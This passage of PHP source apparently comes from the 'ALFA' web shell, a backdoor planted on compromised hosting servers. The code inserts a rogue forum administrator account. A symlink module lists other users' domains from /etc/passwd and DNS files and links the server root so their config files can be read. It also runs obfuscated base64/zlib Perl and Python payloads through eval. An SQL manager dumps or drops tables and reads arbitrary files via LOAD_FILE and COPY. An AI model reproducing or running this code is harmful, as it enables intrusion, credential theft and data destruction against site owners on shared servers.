$solevisible=@mysqli_query($conn,”insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,’$admin’,’1′,’$admin’,’$setpwAlg’,’solevisible@fbi.gov’)”) or die(mysqli_error($conn));
if($solevisible){
__alert(‘Success… ‘.$admin.’ is created…’);}
}
}
echo “</div>”;
alfafooter();
}
function alfaMakePwd(){
if(_alfa_file_exists(“/etc/virtual/domainowners”)||(_alfa_file_exists(“/etc/named.conf”)&&_alfa_file_exists(“/etc/valiases”))){
return “/home/{user}/public_html/”;
}
$document = explode(“/”, $_SERVER["DOCUMENT_ROOT"]);
$public = end($document);
array_pop($document);
array_pop($document);
$path = implode(“/”, $document) . “/{user}/” . $public;
return $path;
}
function alfaGetDomains($state = false){
$state = “named.conf”;
$lines = array();
$lines = _alfa_file(‘/etc/named.conf’);
if(!$lines){
$lines = @scandir(“/etc/valiases/”);
$state = “valiases”;
if(!$lines){
$lines = @scandir(“/var/named”);
$state = “named”;
if(!$lines && $state){
$lines = _alfa_file(‘/etc/passwd’);
$state = “passwd”;
}
}
}
return array(“lines” => $lines, “state” => $state);
}
function alfasymlink(){
alfahead();
AlfaNum(9,10);
echo ‘<div class=header><br><center><div class=”txtfont_header”>| Symlink |</div><center><h3><a href=javascript:void(0) onclick=”g(\’symlink\’,null,null,\’symphp\’)”>| Symlink( php ) | </a><a href=javascript:void(0) onclick=”g(\’symlink\’,null,null,\’symperl\’)”>| Symlink( perl ) | </a><a href=javascript:void(0) onclick=”g(\’symlink\’,null,null,\’sympy\’)”>| Symlink( python ) | </a><a href=javascript:void(0) onclick=”g(\’symlink\’,null,null,null,null,\’SymFile\’)”>| File Symlink | </a></h3></center>’;
if(isset($_POST['alfa2'])&&($_POST['alfa2']==’symperl’||$_POST["alfa2"]==”sympy”)){
$sympath = alfaMakePwd();
@mkdir(‘cgialfa’,0755);
@chdir(‘cgialfa’);
alfacgihtaccess(‘cgi’);
$perl = ‘#!/usr/bin/perl   -I/usr/local/bandmin’.”\n”.’use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64(“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”)));’;
$py = ‘#!/usr/bin/python’.”\nimport zlib, base64\n”.’eval(compile(zlib.decompress(base64.b64decode(“eJydWG1v2zYQ/mz/ClZFZntxJDvY9sFxPGRpshXo2mHNMAyJIdAibWuRRYGkY3tF99t3xxdJtpW0mD5YFHnvvHt4tJa7UbuVrgohNUkWqZ61W+YV8pzOMt7ttfk24YUGqoIq1W47Wp2uuB8L5UdqVw5luVxsWLu9yMSMZjGMySUJAv+9lpn9fvsxvv75LYxvaaY4qJmDWDDiKZUiD5dUxY981w1+vrq7+fPqr/jt+7ub32+vrm+CHlhWMt/JNW9zEACTexrBsJDKxdP9cFquON3gLs3mNArabcbnZME18nQLoVA02OGlO9tgsiW5XsucVCoMIbAgVcBSyRMdECFJF5woqF6GqZqnEM4g4jqJcrriLExEPg96hOaMVFTA64ieaJZSxVUU9Ho1nUG0FCsefVorLj9HxXqWpUm81KsMHGgBN5hQi9x98ObD9R+/3ry/i3//8OEumIaqyFINKoIe7KjhBgbkCwtRwHa36mOv80R5hScqICcE+cO/RZp3kbrXJ1ZSz4ZwRR+5lt1ErHPdJ0ysaJr3CfL3SbJh6M1S6wKDj+9RFAWnChgsZc/E0o5NOO9/xGcaYBAcX+dv+kRVIlNITJpxCQ5tOElorsk8hXha7jAMg14H3JQpLARjLYnSu4xfdjTf6jOI7yIfJTzXXF50JmPNJuO5AMpEZEJedl7fwjMYdibWOuNO7zQYR0g0GUdIr1mDyIzPNQqkZCn5/LJj+dF0YO8QDYnI9WUnnmU0f+wcKB0Mrs7PB16pC0lNKy01N1h7e+sZMdrHxh7aVFUC0GIVqN0qS/PHCMfFzn2FeqtdDGD3ToPoSz5A2ODpTD5a/iPbIy0nkK0mWZiInRpfcqudK9p6KQIs0TyWnLLYVI8v9laqYsh0vaZZOfVEZUlk4aRl4yg2OTcF4ma5lFCj5afnuQeMAIO4cmM2QzeTxyxV2k3Vqt1wmeTcM8XJPDbbL2gDva1Skyh43oAPITIbGizIlkVjcmNeqciNCC+qkqVCNLYRTJCwUUolplkOhNVaZmW09uJsI/+s6DLUlo5nx3A5ejkmLrJRfSePonO4z86ql4PmXTgOmlP5Uswa97weylL6V23vs/F7No0OIgtxNRPIdpDeLRNwEuA5vmHBRevlgDuyr0rA521w2OtKnNzgPOIy5oA9S0t0xn6DzIRkHDBk2PHAOoPKW0gAX3Zm8GX0emCeixVgUJqPBoSutTAAvgRLJ/8b5r89AstGYH5jUky9TOzB+A+A4S+SNoOlB0r4cX7NBNshbra2EOohvOcQdNwZAiel2aFyL4EAXyGAdlrYzKKMSa6UW8EZUyaYEfev8Jmi6BZAfKz5qrBtGWZ4E9SZ6Vr913ojeBSnMlmCBAkWmHG3E3774z8CDAu6MOoF5FOnbwxxWALiLKUTUTPXzoeYA0V36Oh5pa0FlaTT3ONPtVCJcCNI5QKAHNqwkM2CPjhopWFrho6gz/twadsdx+79PujpPHfPqa1qv4wwnGIhnGbFZp0ybAmVprrig88YFnphsTHxdB42A8Gz3tbnq2lGNS2TwbZ+I+c1eAIGdJGiR8bkvEFO6QAS3Q+m7f2wmtnh1Eurg68Ttsc/nNbz8UjQYH+5lncOikZlqgBiGLvvz6do+veDQWN0ahrKLtIulJ2vbTZ8aD5H/myrl8GJzwOr8/up73fBI0deK5RXhwbXRDltZRraphoy0cTJynKiDgAfbwkH4cD7RXX8jFwm52z/eDAgYZIbQMLIqh1MQIiv/W3JYwxbWf8N1vhg5/HXVrrJc8cF4jyjF1Tp9CsH5e64DFGqyHuQX/Ie7Dmmx0FU6vLL+pKVShxUm3IW9ANz7HmsMN+1fI6hbLCmoHjsvpEzA8fwHPaJHjGQ7H4wKtmnuJHWgr1pby+b2cSDvDuxSvrOzloUgQj2tFRZBmQ/Hi13Hdt6CS7bzF3MJKYXuSWnl96RKpPKzq7mXUgLaBRYl83KWvX0+ydBpbsswOfUV9pr6NUQBlfTpWIbhXqP3gRklSGO/xkzajGoi9x32LcskT2S4Y29CxzNcKcBi2JTJXFsijWOERTjGMGg9ndCrfO5BjuhOznTu4KPCPYsEd7nH/KHfIyDydid/6kGJdcCwzzbkat3t1fkjl/9CurNyth0PRP6ybQ9jCdCUnNw5FAtF5/HkV0fR1Ycmk5mi6q9sW1IUBrWGbP0ybVSgDmMpfliNBwU2wvXep3NhNZiZeds4zYaFltAc7UEG1/PzXPhurb53HRtxz0Z9jtnG54ulno0ExmzEyr9h4/OfwDJQeWzEtAiKsrIN7DnT6lKsWX8l7jWify0I7/t9FLk4whMn8DV353FeOTuFOxyN5ArcibnpHbZNbUNFJgi+HdGt1Nb7LjFZIn3goMVL9leX4MIW4rjm7OhW2qaJO4oem39AWs/oj8fjT9vvT8P+Qdz3iuYYnwLbfmtyDKxASffgUj1kL8xFyYhd4bABMXxhgUkzEN+xdgdJJPNJUAxqI9iWRBMJvzBj+9IYZMMaH+BwyWDY/rL5Jgcq/KaEHqnACA3pyaMq3AjU827fsXOJZlQ+Fdiu6l9eul6tw8ntb8KguoiypuW3Z0S1g/bqD7eTer3DpuFUD0Fzf3Fwaas5AwuDCfQv+MaFI4jxVYAhPwHJ4ZsdA==”)),\’<string>\’,\’exec\’))’;
$cginame = “symperl.alfa”;
$source = $perl;
$lang = “perl”;
if($_POST["alfa2"]==”sympy”){
$cginame = “pysymlink.alfa”;
$source = $py;
$lang = “python”;
}
@__write_file($cginame,$source);
@chmod($cginame,0755);
echo __pre();
$resource = alfaEx(“{$lang} {$cginame} {$sympath}”,false,true,true);
if(strlen($resource) == 0){
echo AlfaiFrameCreator(‘cgialfa/’.$cginame);
}else{
echo $resource;
}
}
if(isset($_POST['alfa4']) && $_POST['alfa4']==’SymFile’){
if(function_exists(‘symlink’)||_alfa_can_runCommand(true,true)){
AlfaNum(9,10);
echo __pre().’
<center><p><div class=”txtfont_header”>| Symlink File And Directory |</div></p><form onSubmit=”g(\’symlink\’,null,null,null,null,\’SymFile\’,this.file.value,this.symfile.value,this.symlink.value);return false;” method=”post”>
<input type=”text” name=”file” placeholder=”Example : /home/user/public_html/config.php” size=”60″/><br />
<input type=”text” name=”symfile” placeholder=”Example : alfa.txt” size=”60″/>
<p><input type=”submit” value=” ” name=”symlink” /></p></form></center>’;
$path = $_POST['alfa5'];
$symname = $_POST['alfa6'];
$solevisible58 = $_POST['alfa7'];
if($solevisible58){
$new_name = str_replace(“.”, “_”, basename($symname));
$rand_dir = $new_name.rand(111,9999);
$sym_dir = ‘alfasymlinkphp/’.$rand_dir.’/’;
@mkdir($sym_dir, 0777, true);
alfacgihtaccess(‘sym’, $sym_dir, $symname);
_alfa_symlink(“$path”,”$sym_dir/$symname”);
echo __pre();
echo ‘<center><b><font color=”white”>Click >> </font><a target=”_blank” href=”‘.$sym_dir.’” ><b><font size=”4″>’.$symname.’</font></b></a></b></center>’;
}
}else{echo “<center><pre class=ml1 style=’margin-top:5px’><b><font color=\”#FFFFFF\”>[+] Symlink Function Disabled !</b></font></pre></center>”;}
}
if(isset($_POST['alfa2']) && $_POST['alfa2']==’symphp’){
$cant_symlink = true;
if(function_exists(‘symlink’)||_alfa_can_runCommand(false,false)){
@mkdir(‘alfasymlink’,0777);
alfacgihtaccess(‘sym’,’alfasymlink/’);
_alfa_symlink(‘/’,’alfasymlink/root’);
$table_header = “<pre id=\”strOutput\” style=\”margin-top:5px\” class=\”ml1\”><br><table id=’tbl_sympphp’ align=’center’ width=’40%’ class=’main’ border=’1′><td><span style=’color:#FFFF01;’><b>*</span></b></td><td><span style=’color:#00A220;’><b>Domains</span></b></td><td><span style=’color:#FFFFFF;’><b>Users</span></b></td><td><span style=’color:#FF0000;’><b>symlink</span></b></td>”;
if(_alfa_file_exists(“/etc/named.conf”) && !_alfa_file_exists(“/etc/virtual/domainowners”) && _alfa_file_exists(“/etc/valiases/”)){
echo “<center>”;
$lines = array();
$anony_domains = array();
$anonymous_users = array();
$f_black = array();
$error = false;
$anonymous = false;
$makepwd = “/home/{user}/public_html/”;
$domains = alfaGetDomains();
$lines = $domains["lines"];
$state = $domains["state"];
$is_posix = function_exists(“posix_getpwuid”) && function_exists(“fileowner”);
$can_runcmd = _alfa_can_runCommand(false,false);
if(!$is_posix && !$can_runcmd){
$anonymous = true;
$anony_domains = $domains["lines"];
$lines = _alfa_file(‘/etc/passwd’);
}
echo $table_header;
$count=1;
$template = ‘<tr><td><span style=”color:#FFFF01;”>{count}</span></td><td style=”text-align:left;”><a target=”_blank” href=”{http}”/><span style=”color:#00A220;margin-left:10px;”><b>{domain}</b> </a></span></td><td style=”text-align:left;”><span style=”color:#FFFFFF;margin-left:10px;”><b>{owner}</font></b></td><td><a href=”alfasymlink/root{sympath}” target=”_blank”><span style=”color:#FF0000;”>Symlink</span></a></td></tr>’;
foreach($lines as $line){
$domain = “”;
$owner = “”;
if($anonymous){
$explode = explode(“:”, $line);
$owner = $explode[0];
$owner_len = strlen($owner) – 1;
$userid = $explode[2];
if((int)$userid < 500)continue;
$domain = “[?????]“;
$temp_black = array();
$finded = false;
foreach($anony_domains as $anony){
if($state == “named.conf”){
if(@strstr($anony, ‘zone’)){
preg_match_all(‘#zone “(.*)”#’,$anony, $data);
$domain = $data[1][0];
}else{
continue;
}
}elseif($state == “named” || $state == “valiases”){
if($anony == “.” || $anony == “..”)continue;
if($state == “named”)$anony = rtrim($anony, “.db”);
$domain = $anony;
}
$sub_domain = str_replace(array(“-”,”.”), “”, $domain);
if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
if(in_array($owner.$domain, $temp_black))continue;
$sympath = str_replace(“{user}”, $owner, $makepwd);
$http = “http://”.$domain;
echo str_replace(array(“{count}”, “{http}”, “{domain}”, “{owner}”, “{sympath}”), array($count, $http, $domain, $owner, $sympath), $template);
$count++;
$temp_black[] = $owner.$domain;
$finded = true;
}
}
if(!$finded){
$anonymous_users[] = $owner;
}
}else{
if($state == “named.conf”){
if(@strstr($line, ‘zone’)){
preg_match_all(‘#zone “(.*)”#’,$line, $data);
$domain = $data[1][0];
}else{
continue;
}
}elseif($state == “named” || $state == “valiases”){
if($line == “.” || $line == “..”)continue;
if($state == “named”)$line = rtrim($line, “.db”);
$domain = $line;
}
if(strlen(trim($domain)) > 2 && $state != “passwd”){
if(!_alfa_file_exists(‘/etc/valiases/’.$domain, false))continue;
if($is_posix){
$user = @posix_getpwuid(@fileowner(‘/etc/valiases/’.$domain));
$owner = $user["name"];
}elseif($can_runcmd){
$owner = alfaEx(“stat -c ‘%U’ /etc/valiases/”.$domain,false,false);
}
}
}
if(!$anonymous){
if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
$sympath = str_replace(“{user}”, $owner, $makepwd);
$http = “http://”.$domain;
if($state == “passwd”){
$http = “javascript:alert(‘we cant find domain…’)”;
}
echo str_replace(array(“{count}”, “{http}”, “{domain}”, “{owner}”, “{sympath}”), array($count, $http, $domain, $owner, $sympath), $template);
$count++;
$f_black[] = $owner.$domain;
}
}
if($anonymous){
foreach($anonymous_users as $owner){
$sympath = str_replace(“{user}”, $owner, $makepwd);
$http = “javascript:alert(‘we cant find domain…’)”;
echo str_replace(array(“{count}”, “{http}”, “{domain}”, “{owner}”, “{sympath}”), array($count, $http, “[????]“, $owner, $sympath), $template);
$count++;
}
}
$cant_symlink = false;
}else{
$is_direct = false;
$makepwd = alfaMakePwd();
if(_alfa_file_exists(“/etc/virtual/domainowners”)){
$makepwd = “/home/{user}/public_html”;
$is_direct = true;
}
$sole = _alfa_file(“/etc/virtual/domainowners”);
$count=1;
echo $table_header;
$template = ‘<tr><td><span style=”color:#FFFF01;”>{count}</span></td><td style=”text-align:left;”><a target=”_blank” href=”http://www.{url}”/><span style=”color:#00A220;margin-left:10px;”><b>{url}</b> </a></span></td><td style=”text-align:left;”><span style=”color:#FFFFFF;margin-left:10px;”><b>{user}</font></b></td><td><a href=”alfasymlink/root{cwd}” target=”_blank”><span style=”color:#FF0000;”>Symlink</span></a></td></tr>’;
if($sole){
foreach($sole as $visible){
if(@strstr($visible,”:”)){
$solevisible = explode(‘:’, $visible);
$cwd = str_replace(“{user}”, trim($solevisible[1]), $makepwd);
echo str_replace(array(“{count}”,”{user}”,”{url}”,”{cwd}”), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
}
}
}else{
$passwd = _alfa_file(“/etc/passwd”);
if($passwd){
$html = “”;
$is_named = false;
$users = array();
$domains = array();
$uknowns = array();
foreach($passwd as $user){
$user = trim($user);
$expl = explode(“:”, $user);
if((int)$expl[2] < 500)continue;
$users[$expl[0]] = $expl[5];
}
$site_domains = @scandir(“/etc/virtual/”);
if(!$site_domains){
$site_domains = alfaEx(“ls /etc/virtual/”);
$site_domains = explode(“\n”, $site_domains);
if(!$site_domains){
$site_domains = _alfa_file(“/etc/named.conf”);
if($site_domains){$is_named = true;}
}
}
foreach($site_domains as $line){
if($is_named){
if(@strstr($line, ‘zone’)){
preg_match_all(‘#zone “(.*)”#’,$line, $data);
$domain = $data[1][0];
if(strlen($domain  > 2) && !empty($domain)){
$domains[] = $domain;
}
}
}else{
$domains[] = $line;
}
}
$x = 1;
foreach($users as $user => $home){
foreach($domains as $domain){
$user_len = strlen($user) – 1;
$sub_domain = str_replace(array(“-”,”.”), “”, $domain);
$five_user = substr($user, 0,$user_len);
$five_domain = substr($sub_domain, 0,$user_len);
if($five_user == $five_domain){
if($is_direct){
$cwd = str_replace(“{user}”, $user, $makepwd);
}else{
$expl = explode(“}/”, $makepwd);
$cwd = $home.”/”.$expl[1];
}
$html .= str_replace(array(“{count}”,”{user}”,”{url}”, “{cwd}”), array($x++, $user, $domain, $cwd), $template);
}else{
$uknowns[$user] = $home;
}
}
}
$uknowns = array_unique($uknowns);
foreach($uknowns as $user => $home){
if($is_direct){
$cwd = str_replace(“{user}”, $user, $makepwd);
}else{
$expl = explode(“}/”, $makepwd);
$cwd = $home.”/”.$expl[1];
}
$html .= str_replace(array(“{count}”,”{user}”,”{url}”, “{cwd}”), array($x++, $user, “[?????]“, $cwd), $template);
}
echo($html);
}
}
echo “</table>”;
$cant_symlink = false;
}
}else{
echo “<pre class=ml1 style=’margin-top:5px’><b><font color=\”#FFFFFF\”>[+] Symlink Function Disabled !</b></font></pre></center>”;
$cant_symlink = false;
}
if($cant_symlink)echo ‘<pre id=”strOutput” style=”margin-top:5px” class=”ml1″><br><font color=”#FFFFFF”>Error…</font></b><br>’;
echo “</center></table>”;
}
echo “</div>”;
alfafooter();
}
function alfasql(){
if(!isset($_POST['sql_host'])){
$_POST['sql_host'] = $_SESSION["sql_host"];
$_POST['sql_login'] = $_SESSION["sql_login"];
$_POST['sql_pass'] = $_SESSION["sql_pass"];
$_POST['sql_base'] = $_SESSION["sql_base"];
}
class DbClass{
public $type;
public $link;
public $res;
function __construct($type){
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type){
case ‘mysql’:
if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
break;
case ‘pgsql’:
$host = explode(‘:’, $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect(“host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname”) ) return true;
break;
}
return false;
}
function selectdb($db){
switch($this->type){
case ‘mysql’:
if(@mysqli_select_db($db))return true;
break;
}
return false;
}
function query($str){
switch($this->type){
case ‘mysql’:
return $this->res = @mysqli_query($this->link,$str);
break;
case ‘pgsql’:
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch(){
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type){
case ‘mysql’:
return @mysqli_fetch_assoc($res);
break;
case ‘pgsql’:
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs(){
switch($this->type){
case ‘mysql’:
return $this->query(“SHOW databases”);
break;
case ‘pgsql’:
return $this->res = $this->query(“SELECT datname FROM pg_database WHERE datistemplate!=’t’”);
break;
}
return false;
}
function listTables(){
switch($this->type){
case ‘mysql’:
return $this->res = $this->query(‘SHOW TABLES’);
break;
case ‘pgsql’:
return $this->res = $this->query(“select table_name from information_schema.tables where table_schema != ‘information_schema’ AND table_schema != ‘pg_catalog’”);
break;
}
return false;
}
function error(){
switch($this->type){
case ‘mysql’:
return @mysqli_error($this->link);
break;
case ‘pgsql’:
return @pg_last_error();
break;
}
return false;
}
function setCharset($str){
switch($this->type){
case ‘mysql’:
if(function_exists(‘mysql_set_charset’))
return @mysqli_set_charset($this->link,$str);
else
$this->query(‘SET CHARSET ‘.$str);
break;
case ‘pgsql’:
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str){
switch($this->type){
case ‘mysql’:
return $this->fetch($this->query(“SELECT LOAD_FILE(‘”.addslashes($str).”‘) as file”));
break;
case ‘pgsql’:
$this->query(“CREATE TABLE solevisible(file text);COPY solevisible FROM ‘”.addslashes($str).”‘;select file from solevisible;”);
$r=array();
while($i=$this->fetch())
$r[] = $i['file'];
$this->query(‘drop table solevisible’);
return array(‘file’=>implode(“\n”,$r));
break;
}
return false;
}
function dump($table, $fp = false){
switch($this->type){
case ‘mysql’:
$res = $this->query(‘SHOW CREATE TABLE `’.$table.’`’);
$create = mysqli_fetch_array($res);
$sql = $create[1].”;\n”;
if($fp) fwrite($fp, $sql); else echo($sql);
$this->query(‘SELECT * FROM `’.$table.’`’);
$head = true;
while($item = $this->fetch()){
$columns = array();
foreach($item as $k=>$v) {
if($v == null)
$item[$k] = “””;
elseif(is_numeric($v))
$item[$k] = $v;
else
$item[$k] = “‘”.@mysqli_real_escape_string($this->link, $v).”‘”;
$columns[] = “`”.$k.”`”;
}
if($head) {
$sql = ‘INSERT INTO `’.$table.’` (‘.implode(“, “, $columns).”) VALUES \n\t(“.implode(“, “, $item).’)’;
$head = false;
} else
$sql = “\n\t,(“.implode(“, “, $item).’)’;
if($fp) fwrite($fp, $sql); else echo($sql);
}
if(!$head)
if($fp) fwrite($fp, “;\n\n”); else echo(“;\n\n”);
break;
case ‘pgsql’:
$this->query(‘SELECT * FROM ‘.$table);
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = “‘”.addslashes($v).”‘”;
$columns[] = $k;
}
$sql = ‘INSERT INTO ‘.$table.’ (‘.implode(“, “, $columns).’) VALUES (‘.implode(“, “, $item).’);’.”\n”;
if($fp) fwrite($fp, $sql); else echo($sql);
}
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
if(@$_POST['alfa1']==’dumpfile’||@$_POST['alfa1']==’droptbl’){
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch($_POST['charset']){
case “Windows-1251″: $db->setCharset(‘calfa1251′); break;
case “UTF-8″: $db->setCharset(‘utf8′); break;
case “KOI8-R”: $db->setCharset(‘koi8r’); break;
case “KOI8-U”: $db->setCharset(‘koi8u’); break;
case “calfa866″: $db->setCharset(‘calfa866′); break;
}
$json = json_decode($_POST['alfa2'],true);
if(count($json['tbl'])>0){
if($_POST['alfa1']==’dumpfile’){
if($fp = @fopen($json['file'],’w’)){
foreach($json['tbl'] as $v)$db->dump($v, $fp);
fclose($fp);
$dumpStatus = true;
}}else{
foreach($json['tbl'] as $v)$db->query(‘DROP TABLE ‘.$v);
}
}
unset($_POST['alfa2']);
}
alfahead();
echo ”
<div class=header><center><div class=’txtfont_header’>| Sql Manager |</div><p>”.getConfigHtml(‘all’).”</p></center>
<form name=’sf’ method=’post’ onsubmit=’fs(this);return false;’><table cellpadding=’2′ cellspacing=’0′><tr>
<td><div class=\”txtfont\”>TYPE</div></td><td><div class=\”txtfont\”>HOST</div></td><td><div class=\”txtfont\”>DB USER</div></td><td><div class=\”txtfont\”>DB PASS</div></td><td><div class=\”txtfont\”>DB NAME</div></td><td></td></tr><tr>
<input type=’hidden’ name=’a’ value=Sql><input type=’hidden’ name=’alfa1′ value=’query’><input type=’hidden’ name=’alfa2′ value=”><input type=hidden name=c value=’”. htmlspecialchars($GLOBALS['cwd']) .”‘><input type=hidden name=charset value=’”. (isset($_POST['charset'])?$_POST['charset']:’UTF-8′) .”‘>
<td><select name=’type’><option value=’mysql’ “;
if(@$_POST['type']==’mysql’)echo ‘selected’;
echo “>MySql</option><option value=’pgsql’ “;
if(@$_POST['type']==’pgsql’)echo ‘selected’;
echo “>PostgreSql</option></select></td>
<td><input type=’text’ name=’sql_host’ id=’db_host’ value=’”. (empty($_POST['sql_host'])?’localhost’:htmlspecialchars($_POST['sql_host'])) .”‘></td>
<td><input type=’text’ name=’sql_login’ id=’db_user’ value=’”. (empty($_POST['sql_login'])?”:htmlspecialchars($_POST['sql_login'])) .”‘></td>
<td><input type=’text’ name=’sql_pass’ id=’db_pw’ value=’”. (empty($_POST['sql_pass'])?”:htmlspecialchars($_POST['sql_pass'])) .”‘></td><td>”;
$tmp = “<input type=’text’ name=’sql_base’ id=’db_name’ value=’”. (empty($_POST['sql_base'])?”:htmlspecialchars($_POST['sql_base'])) .”‘>”;
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
$_SESSION["sql_host"] = $_POST['sql_host'];
$_SESSION["sql_login"] = $_POST['sql_login'];
$_SESSION["sql_pass"] = $_POST['sql_pass'];
$_SESSION["sql_base"] = $_POST['sql_base'];
switch($_POST['charset']){
case “Windows-1251″: $db->setCharset(‘calfa1251′); break;
case “UTF-8″: $db->setCharset(‘utf8′); break;
case “KOI8-R”: $db->setCharset(‘koi8r’); break;
case “KOI8-U”: $db->setCharset(‘koi8u’); break;
case “calfa866″: $db->setCharset(‘calfa866′); break;
}
$db->setCharset(‘utf8′);
$db->listDbs();
echo “<select name=sql_base><option value=”></option>”;
while($item = $db->fetch()) {
list($key, $value) = each($item);
echo ‘<option value=”‘.$value.’” ‘.($value==$_POST['sql_base']?’selected’:”).’>’.$value.’</option>’;
}
echo ‘</select>’;
}
else echo $tmp;
}else
echo $tmp;
echo “</td>
<td><input type=’submit’ value=’ ‘></td>
<td><input type=’checkbox’ name=’sql_count’ value=’on’” . (empty($_POST['sql_count'])?”:’ checked’) . “> <div class=\”txtfont\”>count the number of rows</div></td>
</tr>
</table>
<script>mysql_cache['host']=’”.addslashes($_POST['sql_host']).”‘;mysql_cache['user']=’”.addslashes($_POST['sql_login']).”‘;mysql_cache['pass']=’”.addslashes($_POST['sql_pass']).”‘;mysql_cache['db']=’”.addslashes($_POST['sql_base']).”‘;mysql_cache['charset']=’”.addslashes($_POST['charset']).”‘;mysql_cache['type']=’”.addslashes($_POST['type']).”‘;mysql_cache['count']=’”.addslashes($_POST['sql_count']).”‘</script>
“;
if(isset($db) && $db->link){
echo “<br/><table width=100% cellpadding=2 cellspacing=0>”;
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo “<tr><td width=1 style=’border-top:2px solid #666;’><div class=’txtfont’>Tables:</div><br><br>”;
$tbls_res = $db->listTables();
while($item = $db->fetch($tbls_res)){
list($key, $value) = each($item);
